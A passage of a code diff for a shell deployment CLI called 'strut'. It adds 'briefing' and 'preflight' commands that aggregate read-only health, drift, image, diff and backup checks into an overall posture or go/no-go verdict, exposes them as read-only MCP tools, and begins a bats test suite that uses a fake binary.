+# JSON body). NEVER aborts the caller: it is always invoked as
+# `out=$(_briefing_run ...) || rc=$?`, so the child's exit code is handed to
+# the normalizer rather than tripping `set -e`. When `timeout`/`gtimeout` is
+# available the check is capped (default 45s) — using the OS timeout rather
+# than a hand-rolled background PID avoids orphaned SSH children on the fast
+# path. A timed-out check exits 124, which normalizers treat as `unknown`.
+_briefing_run() {
+  local bin
+  bin=$(_briefing_bin)
+  local secs="${STRUT_BRIEFING_TIMEOUT:-45}"
+  if command -v timeout >/dev/null 2>&1; then
+    timeout "$secs" "$bin" "$@" 2>/dev/null
+  elif command -v gtimeout >/dev/null 2>&1; then
+    gtimeout "$secs" "$bin" "$@" 2>/dev/null
+  else
+    "$bin" "$@" 2>/dev/null
+  fi
+}
+
+# _briefing_json_extract — stdin -> stdout, from the first `{`/`[` line onward.
+# Drops any leading log/ok lines a check prints before its JSON body.
+_briefing_json_extract() {
+  awk 'f{print; next} /^[[:space:]]*[{[]/{f=1; print}'
+}
+
+# ── Per-dimension normalizers ─────────────────────────────────────────────────
+# Each echoes:  <severity><TAB><one-line summary>
+# Callers read with:  IFS=$'\t' read -r sev summary <<<"$result"
+
+# _briefing_norm_health <stdout> <rc>
+# health --json emits {"overall_status":"healthy|degraded|unhealthy","checks":[…]}
+# and returns 0/1/2. Prefer the parsed overall_status; fall back to rc.
+_briefing_norm_health() {
+  local out="$1" rc="$2"
+  [ "$rc" = "124" ] && { printf 'unknown\thealth check timed out'; return 0; }
+
+  local json overall total running summary=""
+  json=$(printf '%s' "$out" | _briefing_json_extract)
+  overall=$(printf '%s' "$json" | jq -r '.overall_status // empty' 2>/dev/null) || overall=""
+  total=$(printf '%s' "$json"   | jq -r '[.checks[]? | select(.name|startswith("Container:"))] | length' 2>/dev/null) || total=""
+  running=$(printf '%s' "$json" | jq -r '[.checks[]? | select(.name|startswith("Container:")) | select(.status=="pass" or .status=="warn")] | length' 2>/dev/null) || running=""
+
+  if [ -n "$total" ] && [ "$total" -gt 0 ] 2>/dev/null; then
+    summary="${running:-0}/${total} containers healthy"
+  fi
+
+  case "$overall" in
+    healthy)   printf 'ok\t%s'       "${summary:-all checks passing}" ;;
+    degraded)  printf 'warn\t%s'     "${summary:-system degraded}" ;;
+    unhealthy) printf 'critical\t%s' "${summary:-system unhealthy}" ;;
+    *)
+      case "$rc" in
+        0) printf 'ok\t%s'       "${summary:-healthy}" ;;
+        1) printf 'warn\t%s'     "${summary:-degraded}" ;;
+        2) printf 'critical\t%s' "${summary:-unhealthy}" ;;
+        *) printf 'unknown\thealth check unavailable' ;;
+      esac
+      ;;
+  esac
+}
+
+# _briefing_norm_drift <stdout> <rc>
+# `drift detect` returns 0 in-sync, non-zero when drift is found. A hard error
+# (no remote target, missing files) also exits non-zero but prints nothing to
+# stdout (its message goes to stderr, which _briefing_run drops) — so a
+# non-zero rc with EMPTY stdout is treated as `unknown` rather than drift.
+_briefing_norm_drift() {
+  local out="$1" rc="$2"
+  [ "$rc" = "124" ] && { printf 'unknown\tdrift check timed out'; return 0; }
+  if [ "$rc" = "0" ]; then
+    printf 'ok\tconfig in sync'
+  elif [ -n "$(printf '%s' "$out" | tr -d '[:space:]')" ]; then
+    printf 'critical\tconfiguration drift detected'
+  else
+    printf 'unknown\tdrift check unavailable'
+  fi
+}
+
+# _briefing_norm_images <stdout> <rc>
+# `drift images --json` emits {"total":N,"drifted":M,...}. No JSON (e.g. no
+# running containers) -> unknown.
+_briefing_norm_images() {
+  local out="$1" rc="$2"
+  [ "$rc" = "124" ] && { printf 'unknown\timage check timed out'; return 0; }
+  local json drifted total
+  json=$(printf '%s' "$out" | _briefing_json_extract)
+  drifted=$(printf '%s' "$json" | jq -r '.drifted // empty' 2>/dev/null) || drifted=""
+  total=$(printf '%s' "$json"   | jq -r '.total // empty'   2>/dev/null) || total=""
+  if [ -z "$drifted" ]; then
+    printf 'unknown\timage check unavailable'
+  elif [ "$drifted" -gt 0 ] 2>/dev/null; then
+    printf 'warn\t%s/%s images have stale digests' "$drifted" "${total:-?}"
+  else
+    printf 'ok\tall %s images current' "${total:-0}"
+  fi
+}
+
+# _briefing_norm_diff <stdout> <rc>
+# `diff --json` emits {"has_changes":bool,"has_destructive_changes":bool,…} and
+# returns 0 (none) / 1 (changes) / 2 (hard error: no VPS_HOST, missing files).
+# No parseable JSON -> unknown.
+_briefing_norm_diff() {
+  local out="$1" rc="$2"
+  [ "$rc" = "124" ] && { printf 'unknown\tdiff check timed out'; return 0; }
+  local json has hasd
+  json=$(printf '%s' "$out" | _briefing_json_extract)
+  # NB: `.has_changes // empty` is WRONG here — jq's // treats a literal
+  # `false` as empty, so a clean "no changes" diff would look unavailable.
+  # Check key presence explicitly and stringify the boolean instead.
+  has=$(printf '%s' "$json" | jq -r 'if type=="object" and has("has_changes") then (.has_changes|tostring) else "MISSING" end' 2>/dev/null) || has="MISSING"
+  hasd=$(printf '%s' "$json" | jq -r 'if type=="object" and (.has_destructive_changes==true) then "true" else "false" end' 2>/dev/null) || hasd="false"
+  # Anything other than an explicit true/false (empty stdin, parse failure,
+  # missing key) means we could not read the diff — degrade to unknown.
+  case "$has" in
+    true)
+      if [ "$hasd" = "true" ]; then
+        printf 'critical\tdestructive pending changes'
+      else
+        printf 'warn\tpending changes to deploy'
+      fi
+      ;;
+    false) printf 'ok\tno pending changes' ;;
+    *)     printf 'unknown\tdiff unavailable (no remote target?)' ;;
+  esac
+}
+
+# _briefing_norm_backup <stdout> <rc>
+# `backup health all --json` emits an ARRAY of per-engine {"status":…,
+# "health_score":…}. Severity is the worst engine status. Empty array / no
+# backups recorded -> unknown.
+_briefing_norm_backup() {
+  local out="$1" rc="$2"
+  [ "$rc" = "124" ] && { printf 'unknown\tbackup check timed out'; return 0; }
+  local json count worst
+  json=$(printf '%s' "$out" | _briefing_json_extract)
+  count=$(printf '%s' "$json" | jq -r 'if type=="array" then length else 0 end' 2>/dev/null) || count=""
+  if [ -z "$count" ] || [ "$count" = "0" ]; then
+    printf 'unknown\tno backups recorded'
+    return 0
+  fi
+  worst=$(printf '%s' "$json" | jq -r '
+    [.[].status] |
+    if   any(.=="critical") then "critical"
+    elif any(.=="degraded") then "degraded"
+    elif any(.=="warning")  then "warning"
+    elif all(.=="healthy")  then "healthy"
+    else "unknown" end' 2>/dev/null) || worst="unknown"
+  case "$worst" in
+    healthy)          printf 'ok\tbackups healthy' ;;
+    warning)          printf 'warn\tbackup health warning' ;;
+    degraded|critical) printf 'critical\tbackup health %s' "$worst" ;;
+    *)                printf 'unknown\tbackup status unclear' ;;
+  esac
+}
+
+# ── Remediation commands ──────────────────────────────────────────────────────
+
+# _briefing_remedy <dimension> <stack> <env> — the exact command that addresses
+# a non-ok dimension, so an operator (or agent) can act without guessing.
+_briefing_remedy() {
+  local dim="$1" stack="$2" env="$3"
+  case "$dim" in
+    health)  printf 'strut %s logs --env %s'          "$stack" "$env" ;;
+    drift)   printf 'strut %s drift fix --env %s'      "$stack" "$env" ;;
+    images)  printf 'strut %s deploy --env %s'         "$stack" "$env" ;;
+    diff)    printf 'strut %s deploy --env %s'         "$stack" "$env" ;;
+    backups) printf 'strut %s backup all --env %s'     "$stack" "$env" ;;
+    *)       printf 'strut %s health --env %s'         "$stack" "$env" ;;
+  esac
+}
+
+# _briefing_glyph <severity> — colored one-word status for human output.
+_briefing_glyph() {
+  case "$1" in
+    ok)       printf '%b' "${GREEN}✓${NC} ok" ;;
+    warn)     printf '%b' "${YELLOW}⚠${NC} warn" ;;
+    critical) printf '%b' "${RED}✗${NC} critical" ;;
+    *)        printf '%s' "? unknown" ;;
+  esac
+}

--- a/lib/cmd_briefing.sh
+++ b/lib/cmd_briefing.sh
@@ -1,0 +1,135 @@
+#!/usr/bin/env bash
+# ==================================================
+# lib/cmd_briefing.sh — one-call operational situation report
+# ==================================================
+# `strut <stack> briefing [--env <name>] [--json]`
+#
+# Fans out every read-only check for a stack (health, config drift, image
+# staleness, pending diff, backup health), normalizes each into a common
+# severity, computes an overall posture (worst-wins), and lists what needs
+# attention with the exact remediation command for each finding. Aggregation
+# only — no new detection logic (see lib/briefing.sh).
+
+set -euo pipefail
+
+_usage_briefing() {
+  cat <<'EOF'
+
+Usage: strut <stack> briefing [--env <name>] [--json]
+
+One-call situation report. Aggregates health, config drift, image staleness,
+pending diff, and backup health into a single posture (ok / warn / critical),
+plus a prioritized list of recommended actions.
+
+Flags:
+  --env <name>     Environment to inspect (default: prod)
+  --json           Structured JSON for CI, dashboards, and MCP
+
+Exit code: 0 when posture is ok; non-zero when warn/critical/unknown, so CI
+and scripts can gate on it.
+EOF
+}
+
+# cmd_briefing [args] — reads CMD_STACK / CMD_ENV_NAME / CMD_JSON
+cmd_briefing() {
+  local a
+  for a in "$@"; do
+    case "$a" in --help|-h) _usage_briefing; return 0 ;; esac
+  done
+
+  local stack="${CMD_STACK:-}"
+  local env="${CMD_ENV_NAME:-}"
+  [ -z "$env" ] && env="prod"
+  local json_mode="false"
+  { [ "${CMD_JSON:-}" = "--json" ] || [ "${OUTPUT_MODE:-}" = "json" ]; } && json_mode="true"
+
+  local -a dims=(health drift images diff backups)
+  local -a sevs=() summaries=()
+
+  local dim out rc result sev summary
+  for dim in "${dims[@]}"; do
+    out=""; rc=0
+    case "$dim" in
+      health)  out=$(_briefing_run "$stack" health --env "$env" --json)       || rc=$?; result=$(_briefing_norm_health "$out" "$rc") ;;
+      drift)   out=$(_briefing_run "$stack" drift detect --env "$env")         || rc=$?; result=$(_briefing_norm_drift  "$out" "$rc") ;;
+      images)  out=$(_briefing_run "$stack" drift images --json --env "$env")  || rc=$?; result=$(_briefing_norm_images "$out" "$rc") ;;
+      diff)    out=$(_briefing_run "$stack" diff --json --env "$env")          || rc=$?; result=$(_briefing_norm_diff   "$out" "$rc") ;;
+      backups) out=$(_briefing_run "$stack" backup health --env "$env" --json) || rc=$?; result=$(_briefing_norm_backup "$out" "$rc") ;;
+    esac
+    IFS=$'\t' read -r sev summary <<<"$result"
+    sevs+=("$sev")
+    summaries+=("$summary")
+  done
+
+  local posture
+  posture=$(_briefing_posture "${sevs[@]}")
+
+  # Prioritized actions: only dimensions WORSE than ok (warn/critical), worst
+  # first. `unknown` ranks below ok — it means "couldn't assess", not a defect
+  # to remediate — so it is surfaced in the dimensions table but never gets a
+  # (misleading) fix command in the actions list.
+  local -a sorted_idx=()
+  local i
+  local non_ok=""
+  for i in "${!dims[@]}"; do
+    case "${sevs[$i]}" in warn|critical) ;; *) continue ;; esac
+    non_ok+="$(_briefing_sev_rank "${sevs[$i]}"):$i"$'\n'
+  done
+  if [ -n "$non_ok" ]; then
+    while IFS= read -r line; do
+      [ -n "$line" ] && sorted_idx+=("${line#*:}")
+    done < <(printf '%s' "$non_ok" | sort -rn -t: -k1,1)
+  fi
+
+  if [ "$json_mode" = "true" ]; then
+    OUTPUT_MODE=json
+    out_json_object
+      out_json_field "stack" "$stack"
+      out_json_field "env" "$env"
+      out_json_field "generated_at" "$(date -u +%FT%TZ)"
+      out_json_field "posture" "$posture"
+      out_json_array "dimensions"
+        for i in "${!dims[@]}"; do
+          out_json_object
+            out_json_field "name" "${dims[$i]}"
+            out_json_field "severity" "${sevs[$i]}"
+            out_json_field "summary" "${summaries[$i]}"
+          out_json_close_object
+        done
+      out_json_close_array
+      out_json_array "actions"
+        for i in "${sorted_idx[@]+"${sorted_idx[@]}"}"; do
+          out_json_object
+            out_json_field "severity" "${sevs[$i]}"
+            out_json_field "dimension" "${dims[$i]}"
+            out_json_field "summary" "${summaries[$i]}"
+            out_json_field "command" "$(_briefing_remedy "${dims[$i]}" "$stack" "$env")"
+          out_json_close_object
+        done
+      out_json_close_array
+    out_json_close_object
+    out_json_newline
+  else
+    echo ""
+    echo -e "${BLUE}Briefing: ${stack} (${env})${NC}"
+    echo -e "Posture: $(_briefing_glyph "$posture")"
+    echo ""
+    out_table_header "Dimension" "Status" "Detail"
+    for i in "${!dims[@]}"; do
+      out_table_row "${dims[$i]}" "$(_briefing_glyph "${sevs[$i]}")" "${summaries[$i]}"
+    done
+    out_table_render
+    if [ "${#sorted_idx[@]}" -gt 0 ]; then
+      echo ""
+      echo "Recommended actions:"
+      for i in "${sorted_idx[@]}"; do
+        echo -e "  • [$(_briefing_glyph "${sevs[$i]}")] ${summaries[$i]}"
+        echo    "      → $(_briefing_remedy "${dims[$i]}" "$stack" "$env")"
+      done
+    fi
+    echo ""
+  fi
+
+  [ "$posture" = "ok" ] && return 0
+  return 1
+}

--- a/lib/cmd_mcp.sh
+++ b/lib/cmd_mcp.sh
@@ -97,7 +97,7 @@ _mcp_cmd_install() {
       echo "  Read-only tools (auto-approved where supported):"
       echo "    strut_list, strut_status, strut_health, strut_logs,"
       echo "    strut_fleet_status, strut_drift_detect, strut_drift_images,"
-      echo "    strut_diff, strut_backup_health"
+      echo "    strut_diff, strut_backup_health, strut_briefing, strut_preflight"
       echo ""
       echo "  Write tools (require approval):"
       echo "    strut_deploy, strut_sync, strut_backup, strut_stop"
@@ -131,7 +131,9 @@ _mcp_cmd_install() {
             "strut_drift_detect",
             "strut_drift_images",
             "strut_diff",
-            "strut_backup_health"
+            "strut_backup_health",
+            "strut_briefing",
+            "strut_preflight"
           ]
         }
       }
@@ -151,7 +153,7 @@ _mcp_cmd_install() {
   echo "  Read-only tools (auto-approved):"
   echo "    strut_list, strut_status, strut_health, strut_logs,"
   echo "    strut_fleet_status, strut_drift_detect, strut_drift_images,"
-  echo "    strut_diff, strut_backup_health"
+  echo "    strut_diff, strut_backup_health, strut_briefing, strut_preflight"
   echo ""
   echo "  Write tools (require approval):"
   echo "    strut_deploy, strut_sync, strut_backup, strut_stop"

--- a/lib/cmd_preflight.sh
+++ b/lib/cmd_preflight.sh
@@ -1,0 +1,208 @@
+#!/usr/bin/env bash
+# ==================================================
+# lib/cmd_preflight.sh — deploy go/no-go safety check
+# ==================================================
+# `strut <stack> preflight [--env <name>] [--json]`
+#
+# Fuses the deploy-relevant read-only checks (pending diff, config drift,
+# current health, backup freshness) into a single verdict — GO / CAUTION /
+# NO-GO — with the reasons behind it and the pre-steps to take first. Reuses
+# lib/briefing.sh normalizers; adds only the release-safety decision logic.
+#
+# Exit codes:  GO → 0,  CAUTION → 1,  NO-GO → 2  (automation can branch on all
+# three).
+
+set -euo pipefail
+
+_usage_preflight() {
+  cat <<'EOF'
+
+Usage: strut <stack> preflight [--env <name>] [--json]
+
+Deploy go/no-go. Evaluates pending diff, config drift, current health, and
+backup freshness, then returns one verdict:
+
+  GO       Safe to deploy.
+  CAUTION  Deployable, but review the listed risks first (unhealthy base,
+           destructive changes, or stale backups).
+  NO-GO    Do not deploy — config drift would be overwritten, or deploy
+           safety could not be assessed.
+
+Flags:
+  --env <name>     Environment to check (default: prod)
+  --json           Structured JSON for CI, dashboards, and MCP
+
+Exit code: GO → 0, CAUTION → 1, NO-GO → 2.
+EOF
+}
+
+# _preflight_verdict_glyph <verdict>
+_preflight_verdict_glyph() {
+  case "$1" in
+    GO)      printf '%b' "${GREEN}✓ GO${NC}" ;;
+    CAUTION) printf '%b' "${YELLOW}⚠ CAUTION${NC}" ;;
+    NO-GO)   printf '%b' "${RED}✗ NO-GO${NC}" ;;
+    *)       printf '%s' "$1" ;;
+  esac
+}
+
+# _preflight_reason_glyph <severity>
+_preflight_reason_glyph() {
+  case "$1" in
+    critical) printf '%b' "${RED}✗${NC}" ;;
+    warn)     printf '%b' "${YELLOW}⚠${NC}" ;;
+    info)     printf '%b' "${BLUE}ℹ${NC}" ;;
+    *)        printf '%s' "•" ;;
+  esac
+}
+
+# cmd_preflight [args] — reads CMD_STACK / CMD_ENV_NAME / CMD_JSON
+cmd_preflight() {
+  local a
+  for a in "$@"; do
+    case "$a" in --help|-h) _usage_preflight; return 0 ;; esac
+  done
+
+  local stack="${CMD_STACK:-}"
+  local env="${CMD_ENV_NAME:-}"
+  [ -z "$env" ] && env="prod"
+  local json_mode="false"
+  { [ "${CMD_JSON:-}" = "--json" ] || [ "${OUTPUT_MODE:-}" = "json" ]; } && json_mode="true"
+
+  # ── Gather the deploy-relevant dimensions (reused normalizers) ──────────────
+  local out rc result
+  local s_diff s_drift s_health s_backups
+
+  out=""; rc=0
+  out=$(_briefing_run "$stack" diff --json --env "$env") || rc=$?
+  result=$(_briefing_norm_diff "$out" "$rc"); s_diff="${result%%$'\t'*}"
+
+  out=""; rc=0
+  out=$(_briefing_run "$stack" drift detect --env "$env") || rc=$?
+  result=$(_briefing_norm_drift "$out" "$rc"); s_drift="${result%%$'\t'*}"
+
+  out=""; rc=0
+  out=$(_briefing_run "$stack" health --env "$env" --json) || rc=$?
+  result=$(_briefing_norm_health "$out" "$rc"); s_health="${result%%$'\t'*}"
+
+  out=""; rc=0
+  out=$(_briefing_run "$stack" backup health --env "$env" --json) || rc=$?
+  result=$(_briefing_norm_backup "$out" "$rc"); s_backups="${result%%$'\t'*}"
+
+  # ── Verdict logic ───────────────────────────────────────────────────────────
+  local -a r_sev=() r_msg=() r_cmd=()
+  local nogo="false" caution="false"
+
+  # NO-GO gates
+  if [ "$s_drift" = "critical" ]; then
+    r_sev+=("critical")
+    r_msg+=("Config drift detected on the VPS — deploying would overwrite un-committed changes")
+    r_cmd+=("strut $stack drift fix --env $env")
+    nogo="true"
+  fi
+  if [ "$s_diff" = "unknown" ] && [ "$s_drift" = "unknown" ]; then
+    r_sev+=("critical")
+    r_msg+=("Cannot assess deploy safety — no remote target configured or checks unavailable")
+    r_cmd+=("strut $stack diff --env $env")
+    nogo="true"
+  fi
+
+  # CAUTION gates
+  if [ "$s_health" = "critical" ]; then
+    r_sev+=("warn")
+    r_msg+=("Stack is currently unhealthy — deploying onto a broken base")
+    r_cmd+=("strut $stack logs --env $env")
+    caution="true"
+  elif [ "$s_health" = "warn" ]; then
+    # Degraded is milder than unhealthy — surfaced for transparency, but it
+    # does not block a deploy on its own (a deploy often restores it).
+    r_sev+=("info")
+    r_msg+=("Stack is degraded — some containers are not fully healthy")
+    r_cmd+=("strut $stack health --env $env")
+  fi
+  if [ "$s_diff" = "critical" ]; then
+    r_sev+=("warn")
+    r_msg+=("Pending changes include destructive operations (data-loss risk)")
+    r_cmd+=("strut $stack diff --env $env")
+    caution="true"
+  fi
+  if [ "$s_backups" = "warn" ] || [ "$s_backups" = "critical" ]; then
+    r_sev+=("warn")
+    r_msg+=("No recent healthy backup — back up before deploying")
+    r_cmd+=("strut $stack backup all --env $env")
+    caution="true"
+  fi
+
+  # Informational (never changes a GO on its own)
+  if [ "$s_diff" = "ok" ]; then
+    r_sev+=("info")
+    r_msg+=("No pending changes to deploy")
+    r_cmd+=("strut $stack diff --env $env")
+  elif [ "$s_diff" = "warn" ]; then
+    r_sev+=("info")
+    r_msg+=("Pending changes are ready to deploy")
+    r_cmd+=("strut $stack deploy --env $env")
+  fi
+
+  local verdict="GO"
+  if [ "$nogo" = "true" ]; then
+    verdict="NO-GO"
+  elif [ "$caution" = "true" ]; then
+    verdict="CAUTION"
+  fi
+
+  # ── Output ──────────────────────────────────────────────────────────────────
+  if [ "$json_mode" = "true" ]; then
+    OUTPUT_MODE=json
+    out_json_object
+      out_json_field "stack" "$stack"
+      out_json_field "env" "$env"
+      out_json_field "generated_at" "$(date -u +%FT%TZ)"
+      out_json_field "verdict" "$verdict"
+      # checks is a flat object of fixed-vocabulary severities (ok/warn/
+      # critical/unknown) — safe to assemble as a raw value, no escaping needed.
+      out_json_field_raw "checks" \
+        "{\"diff\":\"$s_diff\",\"drift\":\"$s_drift\",\"health\":\"$s_health\",\"backups\":\"$s_backups\"}"
+      out_json_array "reasons"
+        if [ "${#r_sev[@]}" -gt 0 ]; then
+          local i
+          for i in "${!r_sev[@]}"; do
+            out_json_object
+              out_json_field "severity" "${r_sev[$i]}"
+              out_json_field "message" "${r_msg[$i]}"
+              out_json_field "command" "${r_cmd[$i]}"
+            out_json_close_object
+          done
+        fi
+      out_json_close_array
+    out_json_close_object
+    out_json_newline
+  else
+    echo ""
+    echo -e "${BLUE}Preflight: ${stack} (${env})${NC}"
+    echo -e "Verdict: $(_preflight_verdict_glyph "$verdict")"
+    echo ""
+    out_table_header "Check" "Status"
+    out_table_row "diff"    "$(_briefing_glyph "$s_diff")"
+    out_table_row "drift"   "$(_briefing_glyph "$s_drift")"
+    out_table_row "health"  "$(_briefing_glyph "$s_health")"
+    out_table_row "backups" "$(_briefing_glyph "$s_backups")"
+    out_table_render
+    if [ "${#r_sev[@]}" -gt 0 ]; then
+      echo ""
+      echo "Reasons:"
+      local i
+      for i in "${!r_sev[@]}"; do
+        echo -e "  $(_preflight_reason_glyph "${r_sev[$i]}") ${r_msg[$i]}"
+        echo    "      → ${r_cmd[$i]}"
+      done
+    fi
+    echo ""
+  fi
+
+  case "$verdict" in
+    GO)      return 0 ;;
+    CAUTION) return 1 ;;
+    NO-GO)   return 2 ;;
+  esac
+}

--- a/lib/mcp/tools.sh
+++ b/lib/mcp/tools.sh
@@ -18,6 +18,8 @@ _mcp_tools_list() {
   {"name":"strut_drift_images","description":"Check for stale container image digests","inputSchema":{"type":"object","properties":{"stack":{"type":"string","description":"Stack name"}},"required":["stack"]}},
   {"name":"strut_diff","description":"Preview pending changes vs VPS for a stack","inputSchema":{"type":"object","properties":{"stack":{"type":"string","description":"Stack name"}},"required":["stack"]}},
   {"name":"strut_backup_health","description":"Show backup health scores for a stack","inputSchema":{"type":"object","properties":{"stack":{"type":"string","description":"Stack name"}},"required":["stack"]}},
+  {"name":"strut_briefing","description":"One-call operational situation report: aggregates health, config drift, image staleness, pending diff, and backup health into an overall posture plus prioritized actions","inputSchema":{"type":"object","properties":{"stack":{"type":"string","description":"Stack name"},"env":{"type":"string","description":"Environment name (default: prod)"}},"required":["stack"]}},
+  {"name":"strut_preflight","description":"Deploy go/no-go verdict (GO/CAUTION/NO-GO): fuses pending diff, config drift, current health, and backup freshness into a release-safety decision with reasons","inputSchema":{"type":"object","properties":{"stack":{"type":"string","description":"Stack name"},"env":{"type":"string","description":"Environment name (default: prod)"}},"required":["stack"]}},
   {"name":"strut_deploy","description":"Deploy/release a stack to VPS (requires approval)","inputSchema":{"type":"object","properties":{"stack":{"type":"string","description":"Stack name"},"env":{"type":"string","description":"Environment name (default: prod)"}},"required":["stack"]}},
   {"name":"strut_sync","description":"Bring a host checkout in sync with origin","inputSchema":{"type":"object","properties":{"host":{"type":"string","description":"Host alias from topology"}},"required":["host"]}},
   {"name":"strut_backup","description":"Create a backup for a stack","inputSchema":{"type":"object","properties":{"stack":{"type":"string","description":"Stack name"},"target":{"type":"string","description":"Backup target (postgres, neo4j, mysql, sqlite, all). Default: all"}},"required":["stack"]}},
@@ -122,6 +124,18 @@ _mcp_tools_call() {
       local stack
       stack=$(_mcp_arg "$args" stack) || { _mcp_reject "invalid 'stack' argument"; return 0; }
       output=$("$strut_bin" "$stack" backup health --env prod --json 2>&1) || rc=$?
+      ;;
+    strut_briefing)
+      local stack env
+      stack=$(_mcp_arg "$args" stack) || { _mcp_reject "invalid 'stack' argument"; return 0; }
+      env=$(_mcp_arg "$args" env prod) || { _mcp_reject "invalid 'env' argument"; return 0; }
+      output=$("$strut_bin" "$stack" briefing --env "$env" --json 2>&1) || rc=$?
+      ;;
+    strut_preflight)
+      local stack env
+      stack=$(_mcp_arg "$args" stack) || { _mcp_reject "invalid 'stack' argument"; return 0; }
+      env=$(_mcp_arg "$args" env prod) || { _mcp_reject "invalid 'env' argument"; return 0; }
+      output=$("$strut_bin" "$stack" preflight --env "$env" --json 2>&1) || rc=$?
       ;;
     strut_deploy)
       local stack env

--- a/strut
+++ b/strut
@@ -190,6 +190,9 @@ source "$LIB/cmd_upgrade.sh"
 source "$LIB/version_check.sh"
 source "$LIB/cmd_sync.sh"
 source "$LIB/cmd_fleet.sh"
+source "$LIB/briefing.sh"
+source "$LIB/cmd_briefing.sh"
+source "$LIB/cmd_preflight.sh"
 
 # Project-local plugins are discovered once PROJECT_ROOT is known. find_project_root
 # above populates it when strut is invoked inside a project; outside one this is a no-op.
@@ -290,6 +293,8 @@ usage() {
   echo "  remote:init [--env <name>] [--host <h>] [--user <u>]          Bootstrap strut on VPS"
   echo "  adopt    --host <h> [--env <name>] [--remote-dir <path>]       Adopt a hand-deployed stack"
   echo "  status   [--env <name>]                                        Stack status"
+  echo "  briefing [--env <name>] [--json]                               One-call situation report (posture + actions)"
+  echo "  preflight [--env <name>] [--json]                              Deploy go/no-go verdict (GO/CAUTION/NO-GO)"
   echo "  volumes  [--env <name>] [status|init|config]                   Volume management"
   echo "  local    start [--services <profile>]                          Start stack locally"
   echo "  local    stop                                                  Stop local stack"
@@ -901,6 +906,8 @@ if [ "$FLAGS_HELP" = "true" ]; then
     validate) _usage_validate ;;
     rollback) _usage_rollback ;;
     diff)     _usage_diff ;;
+    briefing) _usage_briefing ;;
+    preflight) _usage_preflight ;;
     remote:init) _usage_remote_init ;;
     adopt)    _usage_adopt ;;
     provision) _usage_provision ;;
@@ -947,6 +954,8 @@ case "$COMMAND" in
   cert:status)         cmd_cert_status "${CMD_ARGS[@]+"${CMD_ARGS[@]}"}" ;;
 
   status)              cmd_status ;;
+  briefing)            cmd_briefing "${CMD_ARGS[@]+"${CMD_ARGS[@]}"}" ;;
+  preflight)           cmd_preflight "${CMD_ARGS[@]+"${CMD_ARGS[@]}"}" ;;
   prune)               cmd_prune "${CMD_ARGS[@]+"${CMD_ARGS[@]}"}" ;;
   volumes)             cmd_volumes "${CMD_ARGS[@]+"${CMD_ARGS[@]}"}" ;;
   local|prod|staging|dev) cmd_local_env "$COMMAND" "${CMD_ARGS[@]+"${CMD_ARGS[@]}"}" ;;

--- a/tests/test_briefing.bats
+++ b/tests/test_briefing.bats
@@ -1,0 +1,272 @@
+#!/usr/bin/env bats
+# ==================================================
+# tests/test_briefing.bats — lib/briefing.sh + lib/cmd_briefing.sh
+# ==================================================
+# Run:  bats tests/test_briefing.bats
+# Covers: severity ranking/posture, per-dimension normalizers (exit-code +
+# guarded jq parsing), error isolation (one failing check -> unknown, siblings
+# still reported), JSON shape, and posture-driven exit codes.
+
+setup() {
+  export CLI_ROOT="$(cd "$(dirname "$BATS_TEST_FILENAME")/.." && pwd)"
+  source "$CLI_ROOT/lib/output.sh"
+  source "$CLI_ROOT/lib/utils.sh"
+  source "$CLI_ROOT/lib/briefing.sh"
+  source "$CLI_ROOT/lib/cmd_briefing.sh"
+
+  export TEST_TMP="$(mktemp -d)"
+  _make_fake_strut
+  # Point the check runner at the fake binary instead of the real strut.
+  export STRUT_HOME="$TEST_TMP"
+  export CMD_STACK=demo CMD_ENV_NAME=prod CMD_JSON=--json
+}
+
+teardown() {
+  rm -rf "$TEST_TMP"
+}
+
+# A fake `strut` that returns canned stdout/rc per subcommand from files the
+# test drops in $TEST_TMP (<key>.out / <key>.rc). Absent files -> empty/0.
+_make_fake_strut() {
+  local d="$TEST_TMP"
+  cat > "$d/strut" <<EOF
+#!/usr/bin/env bash
+shift  # drop stack
+case "\$1 \${2:-}" in
+  "health"*)       key=health ;;
+  "drift detect")  key=drift_detect ;;
+  "drift images")  key=drift_images ;;
+  "diff"*)         key=diff ;;
+  "backup health") key=backup_health ;;
+  *)               key=unknown ;;
+esac
+[ -f "$d/\$key.out" ] && cat "$d/\$key.out"
+if [ -f "$d/\$key.rc" ]; then exit "\$(cat "$d/\$key.rc")"; fi
+exit 0
+EOF
+  chmod +x "$d/strut"
+}
+
+# _resp <key> <stdout> <rc>
+_resp() {
+  printf '%s' "$2" > "$TEST_TMP/$1.out"
+  printf '%s' "$3" > "$TEST_TMP/$1.rc"
+}
+
+# All-healthy baseline; individual tests override single dimensions.
+_baseline_healthy() {
+  _resp health        '{"overall_status":"healthy","checks":[{"name":"Container: web","status":"pass"}]}' 0
+  _resp drift_detect  'in sync' 0
+  _resp drift_images  '{"stack":"demo","total":2,"drifted":0,"images":[]}' 0
+  _resp diff          '{"has_changes":false,"has_destructive_changes":false}' 0
+  _resp backup_health '[{"status":"healthy","health_score":95}]' 0
+}
+
+# ── Severity ranking / posture ────────────────────────────────────────────────
+
+@test "worst: higher-ranked severity wins" {
+  [ "$(_briefing_worst ok warn)" = "warn" ]
+  [ "$(_briefing_worst critical warn)" = "critical" ]
+  [ "$(_briefing_worst ok unknown)" = "ok" ]
+  [ "$(_briefing_worst unknown unknown)" = "unknown" ]
+}
+
+@test "posture: worst-wins across dimensions" {
+  [ "$(_briefing_posture ok ok warn ok)" = "warn" ]
+  [ "$(_briefing_posture ok warn critical)" = "critical" ]
+}
+
+@test "posture: all-unknown collapses to unknown" {
+  [ "$(_briefing_posture unknown unknown unknown)" = "unknown" ]
+}
+
+@test "posture: unknown never dominates a real ok" {
+  [ "$(_briefing_posture ok unknown unknown)" = "ok" ]
+}
+
+# ── health normalizer ─────────────────────────────────────────────────────────
+
+@test "norm_health: healthy json -> ok with container count" {
+  run _briefing_norm_health '{"overall_status":"healthy","checks":[{"name":"Container: web","status":"pass"}]}' 0
+  [[ "$output" == ok$'\t'* ]]
+  [[ "$output" == *"1/1 containers healthy"* ]]
+}
+
+@test "norm_health: degraded json -> warn" {
+  run _briefing_norm_health '{"overall_status":"degraded","checks":[{"name":"Container: db","status":"fail"}]}' 1
+  [[ "$output" == warn$'\t'* ]]
+}
+
+@test "norm_health: unhealthy json -> critical" {
+  run _briefing_norm_health '{"overall_status":"unhealthy","checks":[]}' 2
+  [[ "$output" == critical$'\t'* ]]
+}
+
+@test "norm_health: no json falls back to rc" {
+  run _briefing_norm_health '' 2
+  [[ "$output" == critical$'\t'* ]]
+  run _briefing_norm_health '' 0
+  [[ "$output" == ok$'\t'* ]]
+}
+
+@test "norm_health: timeout (rc 124) -> unknown" {
